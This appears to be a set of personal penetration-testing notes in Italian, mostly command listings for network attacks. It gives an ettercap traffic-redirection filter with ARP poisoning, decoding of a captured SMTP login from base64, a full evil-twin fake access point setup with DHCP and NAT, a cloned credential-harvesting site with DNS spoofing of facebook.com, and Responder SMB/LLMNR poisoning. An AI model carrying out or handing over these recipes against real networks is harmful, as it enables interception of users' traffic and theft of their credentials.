ora dobbiamo ricevere i pacchetti da 192.168.149.1 verso 192.168.149.135
e lo facciamo con un filtro ettercap:
vi filter.e
if(ip.dst == '192.168.149.135' && ip.src == '192.168.149.1'){
#drop();
ip.dst = '192.168.149.139';
msg("RaN\n\r");
}
facciamo leggere il filtro da ettercap:
# etterfilter filter.e -o filter
lancio ettercap:
# ettercap -F filter -M ARP // // -Tpq
se ora mi collego al server http posso vedere la pagina oscurata
- discover dchp server con nmap
sudo nmap --script broadcast-dhcp-discover -e eth0
- Convertire hash base64 smtp
L'autenticazione smtp plain codifica user e pass in base64, quindi per convertire in plain text uso:
echo "AGRpcmV6aW9uZUBtZXBlbC5pdAA0MzdkcjY2Mg==" | base64 -d
- Fake access point + DNS spoofing + fake website
pkill airbase-ng
pkill dhcpd
apt-get install isc-dhcp-server
vi /etc/dhcp/dhcpd.conf
Impostare la Subnetting del dhcpd
subnet 192.168.2.0 netmask 255.255.255.0 {
range 192.168.2.100...
airmon-ng stop wlan0
airmon-ng start wlan0 (interfaccia wifi che sarà il falso access point)
airbase-ng -e accesspointname -c 11 -v wlan0mon
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE (wlan1 nostra interfaccia collegata ad internet)
ifconfig at0
ifconfig at0 192.168.2.1 netmask 255.255.255.0
ruote add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0 &
echo 1 > /proc/sys/net/ipv4/ip_forward
Ora:
service apache2 start
Oppure clonare sito per hacking credenziali:
usare setoolkit (social engineering toolkit)
E selezionare:
1 social engineering attack
2 website attack vector
3 credential harvester attack method
2 site cloner
locate etter.dns
vi /etc/ettercap/etter.dns
Impostare quindi nel file etter.dns il DNS spoofing di un sito come:
www.facebook.com A 192.168.2.1
facebook.com A 192.168.2.1
ettercap -G
sniff->unified sniffing->network interface->at0
plugins->manage the plugins->dns_spoof
Hosts->scan for hosts (da eseguire dopo che un host si sarà connesso la fake ap)
Oppure:
Host->host list
E selezionare come target1 il gw della rete e come target2 l'ip della vittima
Target->current target (per vedere i target selezionati)
Mitm->arp poisoning->sniff remote connections
Start-> start sniffing
- Responder sniff and poison smb traffic
sniff and poison smb traffic (Llmnr ndns nbt-ns poisoner)
sudo Responder.py -I eth0 -wrf
